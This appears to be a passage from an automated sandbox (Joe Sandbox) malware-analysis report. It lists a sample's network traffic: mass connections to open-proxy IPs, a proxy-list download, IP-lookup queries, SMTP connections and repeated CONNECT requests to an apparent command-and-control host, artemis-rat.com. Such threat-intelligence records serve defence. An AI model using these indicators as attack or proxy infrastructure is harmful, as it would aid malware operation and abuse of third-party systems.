                Source: global trafficTCP traffic: 192.168.2.4:50119 -> 27.147.157.78:8080
                Source: global trafficTCP traffic: 192.168.2.4:50122 -> 184.178.172.17:4145
                Source: global trafficTCP traffic: 192.168.2.4:50123 -> 87.238.192.54:32667
                Source: global trafficTCP traffic: 192.168.2.4:50124 -> 187.40.1.123:128
                Source: global trafficTCP traffic: 192.168.2.4:50125 -> 65.20.147.153:8080
                Source: global trafficTCP traffic: 192.168.2.4:50126 -> 200.59.10.49:999
                Source: global trafficTCP traffic: 192.168.2.4:50127 -> 190.82.105.123:43949
                Source: global trafficTCP traffic: 192.168.2.4:50128 -> 121.130.172.153:3128
                Source: global trafficTCP traffic: 192.168.2.4:50129 -> 36.94.35.225:8080
                Source: global trafficTCP traffic: 192.168.2.4:50131 -> 8.222.152.158:55555
                Source: global trafficTCP traffic: 192.168.2.4:50132 -> 134.195.91.76:27432
                Source: global trafficTCP traffic: 192.168.2.4:50134 -> 162.240.147.48:37704
                Source: global trafficTCP traffic: 192.168.2.4:50136 -> 188.132.222.167:8080
                Source: global trafficTCP traffic: 192.168.2.4:50137 -> 206.189.15.100:54330
                Source: global trafficTCP traffic: 192.168.2.4:50138 -> 66.45.246.194:8888
                Source: global trafficTCP traffic: 192.168.2.4:50140 -> 120.48.62.239:8080
                Source: global trafficTCP traffic: 192.168.2.4:50142 -> 202.4.107.69:5678
                Source: global trafficTCP traffic: 192.168.2.4:50143 -> 142.54.235.9:4145
                Source: global trafficTCP traffic: 192.168.2.4:50144 -> 103.164.58.190:8080
                Source: global trafficTCP traffic: 192.168.2.4:50146 -> 165.227.196.37:54266
                Source: global trafficTCP traffic: 192.168.2.4:50149 -> 119.47.90.25:8080
                Source: global trafficTCP traffic: 192.168.2.4:50150 -> 20.219.176.57:3129
                Source: global trafficTCP traffic: 192.168.2.4:50151 -> 114.103.81.201:8089
                Source: global trafficTCP traffic: 192.168.2.4:50152 -> 162.214.121.11:18809
                Source: global trafficTCP traffic: 192.168.2.4:50153 -> 46.250.241.181:3128
                Source: global trafficTCP traffic: 192.168.2.4:50154 -> 213.233.161.246:4153
                Source: global trafficTCP traffic: 192.168.2.4:50156 -> 91.202.230.219:8080
                Source: global trafficTCP traffic: 192.168.2.4:50157 -> 157.100.6.202:999
                Source: global trafficTCP traffic: 192.168.2.4:50158 -> 82.153.138.184:8888
                Source: global trafficTCP traffic: 192.168.2.4:50161 -> 188.132.222.171:8080
                Source: global trafficTCP traffic: 192.168.2.4:50162 -> 14.56.98.15:3128
                Source: global trafficTCP traffic: 192.168.2.4:50163 -> 139.60.183.10:4153
                Source: global trafficTCP traffic: 192.168.2.4:50164 -> 5.252.23.220:1081
                Source: global trafficTCP traffic: 192.168.2.4:50167 -> 66.228.33.190:17464
                Source: global trafficTCP traffic: 192.168.2.4:50168 -> 103.125.154.233:8080
                Source: global trafficTCP traffic: 192.168.2.4:50169 -> 103.174.178.137:2016
                Source: global trafficTCP traffic: 192.168.2.4:50170 -> 154.16.116.166:39759
                Source: global trafficTCP traffic: 192.168.2.4:50172 -> 51.75.126.150:34144
                Source: global trafficTCP traffic: 192.168.2.4:50173 -> 213.32.66.64:50163
                Source: global trafficTCP traffic: 192.168.2.4:50175 -> 103.179.246.30:8080
                Source: global trafficTCP traffic: 192.168.2.4:50178 -> 185.150.140.143:5678
                Source: global trafficTCP traffic: 192.168.2.4:50179 -> 18.169.83.87:1080
                Source: global trafficTCP traffic: 192.168.2.4:50181 -> 178.176.134.67:3629
                Source: global trafficTCP traffic: 192.168.2.4:50183 -> 52.80.19.207:3128
                Source: global trafficTCP traffic: 192.168.2.4:50182 -> 160.153.245.187:38586
                Source: global trafficTCP traffic: 192.168.2.4:50184 -> 31.146.5.178:8080
                Source: global trafficTCP traffic: 192.168.2.4:50186 -> 47.116.126.120:3128
                Source: global trafficTCP traffic: 192.168.2.4:50187 -> 165.227.104.122:29992
                Source: global trafficTCP traffic: 192.168.2.4:50188 -> 52.35.240.119:1080
                Source: global trafficTCP traffic: 192.168.2.4:50189 -> 213.16.81.147:5678
                Source: global trafficTCP traffic: 192.168.2.4:50191 -> 94.131.14.66:3128
                Source: global trafficTCP traffic: 192.168.2.4:50192 -> 191.97.19.66:999
                Source: global trafficTCP traffic: 192.168.2.4:50194 -> 58.18.43.34:10800
                Source: global trafficTCP traffic: 192.168.2.4:50195 -> 107.181.168.145:4145
                Source: global trafficTCP traffic: 192.168.2.4:50196 -> 123.182.59.29:8089
                Source: global trafficTCP traffic: 192.168.2.4:50197 -> 173.212.250.16:64768
                Source: global trafficTCP traffic: 192.168.2.4:50198 -> 188.164.197.178:55677
                Source: global trafficTCP traffic: 192.168.2.4:50199 -> 34.129.188.117:3128
                Source: global trafficTCP traffic: 192.168.2.4:50200 -> 67.43.236.21:29477
                Source: global trafficTCP traffic: 192.168.2.4:50202 -> 103.165.126.65:8080
                Source: global trafficTCP traffic: 192.168.2.4:50205 -> 38.133.200.94:31596
                Source: global trafficTCP traffic: 192.168.2.4:50206 -> 142.54.231.38:4145
                Source: global trafficTCP traffic: 192.168.2.4:50207 -> 212.87.255.155:5678
                Source: global trafficTCP traffic: 192.168.2.4:50208 -> 62.109.0.18:24101
                Source: global trafficTCP traffic: 192.168.2.4:50209 -> 187.62.191.3:61456
                Source: global trafficTCP traffic: 192.168.2.4:50211 -> 201.149.127.22:8080
                Source: global trafficTCP traffic: 192.168.2.4:50212 -> 51.158.78.200:16379
                Source: global trafficTCP traffic: 192.168.2.4:50213 -> 130.193.123.34:5678
                Source: global trafficTCP traffic: 192.168.2.4:50174 -> 79.110.52.252:3128
                Source: global trafficTCP traffic: 192.168.2.4:50215 -> 34.32.145.197:3128
                Source: global trafficTCP traffic: 192.168.2.4:50216 -> 110.93.231.73:5678
                Source: global trafficTCP traffic: 192.168.2.4:50217 -> 103.48.69.113:83
                Source: global trafficTCP traffic: 192.168.2.4:50219 -> 27.123.1.37:4153
                Source: global trafficTCP traffic: 192.168.2.4:50220 -> 46.227.37.49:1088
                Source: global trafficTCP traffic: 192.168.2.4:50221 -> 104.165.127.75:3128
                Source: global trafficTCP traffic: 192.168.2.4:50223 -> 185.109.184.150:53155
                Source: global trafficTCP traffic: 192.168.2.4:50225 -> 41.65.236.39:1981
                Source: global trafficTCP traffic: 192.168.2.4:50226 -> 94.131.106.196:3128
                Source: global trafficTCP traffic: 192.168.2.4:50227 -> 207.244.229.34:7976
                Source: global trafficTCP traffic: 192.168.2.4:50228 -> 156.239.53.118:3128
                Source: global trafficTCP traffic: 192.168.2.4:50229 -> 75.119.145.169:53129
                Source: global trafficTCP traffic: 192.168.2.4:50233 -> 104.37.135.145:4145
                Source: global trafficTCP traffic: 192.168.2.4:50236 -> 81.199.14.17:1088
                Source: global trafficTCP traffic: 192.168.2.4:50237 -> 20.37.207.8:8080
                Source: global trafficTCP traffic: 192.168.2.4:50238 -> 162.214.227.68:55392
                Source: global trafficTCP traffic: 192.168.2.4:50241 -> 104.248.158.78:12403
                Source: global trafficTCP traffic: 192.168.2.4:50246 -> 163.172.158.70:16379
                Source: global trafficTCP traffic: 192.168.2.4:50247 -> 188.132.222.166:8080
                Source: global trafficTCP traffic: 192.168.2.4:50249 -> 118.218.126.54:9400
                Source: global trafficTCP traffic: 192.168.2.4:50250 -> 160.153.254.240:1138
                Source: global trafficTCP traffic: 192.168.2.4:50251 -> 182.78.42.112:84
                Source: global trafficTCP traffic: 192.168.2.4:50239 -> 103.6.177.174:8002
                Source: global trafficTCP traffic: 192.168.2.4:50252 -> 103.148.51.19:8080
                Source: global trafficTCP traffic: 192.168.2.4:50240 -> 202.58.199.229:5678
                Source: global trafficTCP traffic: 192.168.2.4:50242 -> 186.201.63.83:3128
                Source: global trafficTCP traffic: 192.168.2.4:50253 -> 41.223.232.117:3128
                Source: global trafficTCP traffic: 192.168.2.4:50245 -> 45.228.77.131:5678
                Source: global trafficTCP traffic: 192.168.2.4:50254 -> 152.231.25.114:8080
                Source: global trafficTCP traffic: 192.168.2.4:50256 -> 103.5.108.129:8085
                Source: global trafficTCP traffic: 192.168.2.4:50255 -> 38.54.116.9:3128
                Source: global trafficTCP traffic: 192.168.2.4:50257 -> 183.89.40.190:1080
                Source: global trafficTCP traffic: 192.168.2.4:50259 -> 202.179.188.178:8080
                Source: global trafficTCP traffic: 192.168.2.4:50260 -> 134.19.254.2:21231
                Source: global trafficTCP traffic: 192.168.2.4:50265 -> 72.206.181.123:4145
                Source: global trafficTCP traffic: 192.168.2.4:50262 -> 194.59.170.116:1080
                Source: global trafficTCP traffic: 192.168.2.4:50263 -> 63.250.52.82:8118
                Source: global trafficTCP traffic: 192.168.2.4:50268 -> 92.247.12.139:9510
                Source: global trafficTCP traffic: 192.168.2.4:50264 -> 103.35.189.217:1080
                Source: global trafficTCP traffic: 192.168.2.4:50270 -> 110.77.236.235:4153
                Source: global trafficTCP traffic: 192.168.2.4:50266 -> 45.234.61.4:999
                Source: global trafficTCP traffic: 192.168.2.4:50271 -> 92.204.135.203:10824
                Source: global trafficTCP traffic: 192.168.2.4:50272 -> 139.162.224.37:3128
                Source: global trafficTCP traffic: 192.168.2.4:50273 -> 125.141.139.112:5566
                Source: global trafficTCP traffic: 192.168.2.4:50274 -> 41.217.220.214:32650
                Source: global trafficTCP traffic: 192.168.2.4:50275 -> 91.227.66.139:8080
                Source: global trafficTCP traffic: 192.168.2.4:50276 -> 157.25.92.74:3128
                Source: global trafficTCP traffic: 192.168.2.4:50277 -> 51.15.133.214:16379
                Source: global trafficTCP traffic: 192.168.2.4:50282 -> 37.187.73.7:41385
                Source: global trafficTCP traffic: 192.168.2.4:50278 -> 194.116.72.46:7497
                Source: global trafficTCP traffic: 192.168.2.4:50283 -> 38.41.0.94:999
                Source: global trafficTCP traffic: 192.168.2.4:50284 -> 153.127.42.160:3128
                Source: global trafficTCP traffic: 192.168.2.4:50287 -> 36.37.104.98:34040
                Source: global trafficTCP traffic: 192.168.2.4:50288 -> 137.184.15.145:8000
                Source: global trafficTCP traffic: 192.168.2.4:50281 -> 36.92.96.179:5678
                Source: global trafficTCP traffic: 192.168.2.4:50289 -> 80.65.28.57:30962
                Source: global trafficTCP traffic: 192.168.2.4:50285 -> 103.66.233.177:4145
                Source: global trafficTCP traffic: 192.168.2.4:50290 -> 94.124.16.218:8901
                Source: global trafficTCP traffic: 192.168.2.4:50292 -> 107.180.88.41:58037
                Source: global trafficTCP traffic: 192.168.2.4:50293 -> 185.208.102.62:8080
                Source: global trafficTCP traffic: 192.168.2.4:50296 -> 67.213.212.57:59930
                Source: global trafficTCP traffic: 192.168.2.4:50299 -> 103.234.24.105:8880
                Source: global trafficTCP traffic: 192.168.2.4:50300 -> 173.212.237.43:63614
                Source: global trafficTCP traffic: 192.168.2.4:50297 -> 166.62.38.100:6322
                Source: global trafficTCP traffic: 192.168.2.4:50298 -> 14.207.118.211:8080
                Source: global trafficTCP traffic: 192.168.2.4:50303 -> 23.105.71.202:8118
                Source: global trafficTCP traffic: 192.168.2.4:50304 -> 193.239.86.248:3128
                Source: global trafficTCP traffic: 192.168.2.4:50305 -> 178.72.90.70:5678
                Source: global trafficTCP traffic: 192.168.2.4:50301 -> 85.237.62.189:3629
                Source: global trafficTCP traffic: 192.168.2.4:50306 -> 38.10.69.102:9090
                Source: global trafficTCP traffic: 192.168.2.4:50307 -> 103.127.106.249:8090
                Source: global trafficTCP traffic: 192.168.2.4:50311 -> 209.14.112.9:1080
                Source: global trafficTCP traffic: 192.168.2.4:50312 -> 62.171.131.101:29497
                Source: global trafficTCP traffic: 192.168.2.4:50316 -> 181.13.198.90:4153
                Source: global trafficTCP traffic: 192.168.2.4:50318 -> 67.43.227.228:2999
                Source: global trafficTCP traffic: 192.168.2.4:50320 -> 103.189.96.98:8080
                Source: global trafficTCP traffic: 192.168.2.4:50321 -> 5.10.249.159:1080
                Source: global trafficTCP traffic: 192.168.2.4:50313 -> 37.120.222.132:3128
                Source: global trafficTCP traffic: 192.168.2.4:50314 -> 117.74.120.128:1133
                Source: global trafficTCP traffic: 192.168.2.4:50323 -> 45.248.66.55:8080
                Source: global trafficTCP traffic: 192.168.2.4:50324 -> 223.247.46.206:8089
                Source: global trafficTCP traffic: 192.168.2.4:50319 -> 103.101.231.125:5678
                Source: global trafficTCP traffic: 192.168.2.4:50325 -> 24.230.33.96:3128
                Source: global trafficTCP traffic: 192.168.2.4:50327 -> 162.216.204.146:1080
                Source: global trafficTCP traffic: 192.168.2.4:50333 -> 8.213.128.90:7779
                Source: global trafficTCP traffic: 192.168.2.4:50334 -> 188.132.222.12:8080
                Source: global trafficTCP traffic: 192.168.2.4:50337 -> 38.162.29.85:3128
                Source: global trafficTCP traffic: 192.168.2.4:50330 -> 69.167.169.46:12903
                Source: global trafficTCP traffic: 192.168.2.4:50338 -> 67.201.59.70:4145
                Source: global trafficTCP traffic: 192.168.2.4:50331 -> 85.238.74.91:8080
                Source: global trafficTCP traffic: 192.168.2.4:50339 -> 49.254.240.252:21028
                Source: global trafficTCP traffic: 192.168.2.4:50332 -> 37.193.40.16:1080
                Source: global trafficTCP traffic: 192.168.2.4:50341 -> 130.162.243.68:3128
                Source: global trafficTCP traffic: 192.168.2.4:50342 -> 20.235.104.105:3729
                Source: global trafficTCP traffic: 192.168.2.4:50344 -> 3.24.58.156:3128
                Source: global trafficTCP traffic: 192.168.2.4:50343 -> 103.19.130.50:8080
                Source: global trafficTCP traffic: 192.168.2.4:50345 -> 64.225.4.63:9993
                Source: global trafficTCP traffic: 192.168.2.4:50347 -> 183.179.187.16:8080
                Source: global trafficTCP traffic: 192.168.2.4:50346 -> 162.214.121.173:52577
                Source: global trafficTCP traffic: 192.168.2.4:50349 -> 190.14.5.162:5678
                Source: global trafficTCP traffic: 192.168.2.4:50350 -> 132.148.129.254:27045
                Source: global trafficTCP traffic: 192.168.2.4:50351 -> 45.6.95.69:4153
                Source: global trafficTCP traffic: 192.168.2.4:50353 -> 188.68.236.126:3128
                Source: global trafficTCP traffic: 192.168.2.4:50354 -> 41.65.236.58:1976
                Source: global trafficTCP traffic: 192.168.2.4:50355 -> 14.103.24.20:8000
                Source: global trafficTCP traffic: 192.168.2.4:50356 -> 114.231.41.235:8089
                Source: global trafficTCP traffic: 192.168.2.4:50358 -> 143.255.176.161:4153
                Source: global trafficTCP traffic: 192.168.2.4:50359 -> 103.125.240.237:8080
                Source: global trafficTCP traffic: 192.168.2.4:50361 -> 103.156.17.153:8080
                Source: global trafficTCP traffic: 192.168.2.4:50363 -> 206.189.130.107:8080
                Source: global trafficTCP traffic: 192.168.2.4:50365 -> 212.244.235.217:4153
                Source: global trafficTCP traffic: 192.168.2.4:50366 -> 148.72.206.84:30651
                Source: global trafficTCP traffic: 192.168.2.4:50367 -> 111.90.150.109:1080
                Source: global trafficTCP traffic: 192.168.2.4:50368 -> 181.233.90.70:999
                Source: global trafficTCP traffic: 192.168.2.4:50370 -> 182.93.69.74:5678
                Source: global trafficTCP traffic: 192.168.2.4:50369 -> 103.118.46.176:8080
                Source: global trafficTCP traffic: 192.168.2.4:50371 -> 51.15.209.188:16379
                Source: global trafficTCP traffic: 192.168.2.4:50372 -> 163.172.131.178:16379
                Source: global trafficTCP traffic: 192.168.2.4:50374 -> 146.19.196.4:4555
                Source: global trafficTCP traffic: 192.168.2.4:50375 -> 206.220.175.2:4145
                Source: global trafficTCP traffic: 192.168.2.4:50376 -> 113.160.16.142:5678
                Source: global trafficTCP traffic: 192.168.2.4:50377 -> 162.214.197.102:42019
                Source: global trafficTCP traffic: 192.168.2.4:50381 -> 58.210.196.42:7302
                Source: global trafficTCP traffic: 192.168.2.4:50382 -> 180.191.16.5:8080
                Source: global trafficTCP traffic: 192.168.2.4:50383 -> 46.253.143.144:3128
                Source: global trafficTCP traffic: 192.168.2.4:50384 -> 212.83.138.60:51640
                Source: global trafficTCP traffic: 192.168.2.4:50385 -> 85.193.93.73:3128
                Source: global trafficTCP traffic: 192.168.2.4:50386 -> 109.232.106.150:52435
                Source: global trafficTCP traffic: 192.168.2.4:50387 -> 45.190.52.24:8080
                Source: global trafficTCP traffic: 192.168.2.4:50388 -> 107.180.95.177:64731
                Source: global trafficTCP traffic: 192.168.2.4:50390 -> 103.74.229.133:8080
                Source: global trafficTCP traffic: 192.168.2.4:50393 -> 103.115.255.145:36331
                Source: global trafficTCP traffic: 192.168.2.4:50395 -> 203.95.198.37:8080
                Source: global trafficTCP traffic: 192.168.2.4:50396 -> 103.147.247.101:8080
                Source: global trafficTCP traffic: 192.168.2.4:50397 -> 178.49.22.23:1080
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 93.171.243.253 93.171.243.253
                Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.4:53011 -> 110.74.195.34:25
                Source: global trafficTCP traffic: 192.168.2.4:54023 -> 160.248.80.91:587
                Source: global trafficTCP traffic: 192.168.2.4:55713 -> 34.195.165.88:587
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
